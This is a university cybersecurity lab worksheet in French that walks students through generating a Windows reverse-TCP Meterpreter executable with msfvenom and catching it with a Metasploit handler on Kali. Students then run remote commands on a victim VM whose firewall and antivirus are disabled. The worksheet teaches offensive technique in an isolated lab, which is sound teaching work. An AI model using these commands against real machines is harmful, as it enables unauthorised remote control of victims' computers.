Université Batna2

Chahid Mostefa Benboulaid

Faculté des sciences Département d’informatique TP Cyber Sécurité 2

TP3: Création Malware (1/2)

Dans cette première partie du TP nous allons voir comment créer un

malware à l'aide de l'une des fonctionnalités de Metasploit framework, à
savoir, Msfvenom.

Msfvenom est un outil livré avec l'environnement Metasploit framework

Attention /!\: Vous n'avez pas le droit d'exploiter les malwares créés contre des machines
qui ne vous appartiennent pas.

1) Lancez vos machines virtuelles Kali et Windows et vérifiez ce qui suit:

a) Le ping entre les deux machines est fonctionnel dans les deux sens.
b) Sur votre VM Windows vérifiez que le pare-feu et l'antivirus sont désactivés.

2) Sur votre machine kali il faut sortir de la console "msfconsole" ensuite tapez la commande
"msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe
LHOST=<IP de votre machine kali> PORT=4444 -o /home/kali/Desktop/ISIDS.exe"

 -p: pour spécifier le payload à utiliser

 -a: pour spécifier l'architecture à utiliser pour la payload (32bits ou 64bits)
 --platform: pour spécifier le système d'exploitation (windows, linux, etc)
 -f: pour spécifier le format du fichier en sortie
 LHOST: l'adresse vers laquelle la machine victime doit se connecter une fois infectée
 PORT: pour spécifier le port de communication entre les machines attaquante et
victime.
 -o: pour spécifier le chemin de sauvegarde du fichier malveillant ainsi que son nom.

Une fois votre commande tapée, cliquez sur entrée et le fichier "ISIDS.exe" va se créer sur
votre bureau.

Afin d'infecter la machine cible, un attaquant pourra envoyer ce dernier par mail en tant que
pièce jointe au mail.

Avant d'aller exécuter ce programme malveillant sur la VM Windows (notre machine

victime), il faut être en écoute sur la machine kali pour intercepter la trafic et ensuite
exécuter les commandes depuis Kali vers la machine Windows. Pour cela, sur votre machine
kali :

a) Tapez la commande "msfconsole"

Enseignante: Nesrine KHERNANE

Université Batna2
Chahid Mostefa Benboulaid
Faculté des sciences Département d’informatique TP Cyber Sécurité 2

b) Tapez la commande "use exploit/multi/handler", cette commande permet de définir le

handler (une fonction qui va gérer nos commandes et l'activité réseau entre la machine kali
et windows)

c) Tapez la commande "show options":

 Quel est le payload affiché avec cette commande ?

 Est ce que c'est le bon payload ?

d) Tapez la commande "set payload windows/meterpreter/reverse_tcp "

e) Tapez la commande "show options":

 Quel est le payload affiché avec cette commande ?

 Est ce que c'est le bon payload ?

f) Tapez la commande "set LHOST <IP de la machine Kali>"

g) Tapez la commande "set LPORT 4444"

h) Tapez la commande "run" ou "exploit"

Vous aurez le message suivant [*] Started reverse TCP handler on <IP de la machine
Kali>:4444. Que signifie ce message ?

Maintenant que notre machine Kali est prête à recevoir le trafic, rendez-vous sur votre
machine Windows (avec le pare-feu et antivirus désactivés).

Lancez le programme "ISIDS.exe " après l'avoir transféré sur votre machine Windows. Que
dis la fenêtre qui s'affiche ?

Cliquez sur "Exécuter". Une fois le programme exécuté, que remarque vous dans votre
machine kali ?

Enseignante: Nesrine KHERNANE

Université Batna2
Chahid Mostefa Benboulaid
Faculté des sciences Département d’informatique TP Cyber Sécurité 2

i) Tapez la commande "pwd"

j) Tapez la commande "execute -f notepad.exe"

k) Tapez la commande "ps", vous pouvez fermer n'importe quel processus avec la
commande "kill <PID de l'application>"

l) vous pouvez tapez les commande "reboot", "shutdown", etc.

Quelle est la différence entre ce tp et le tp précédent ?

Enseignante: Nesrine KHERNANE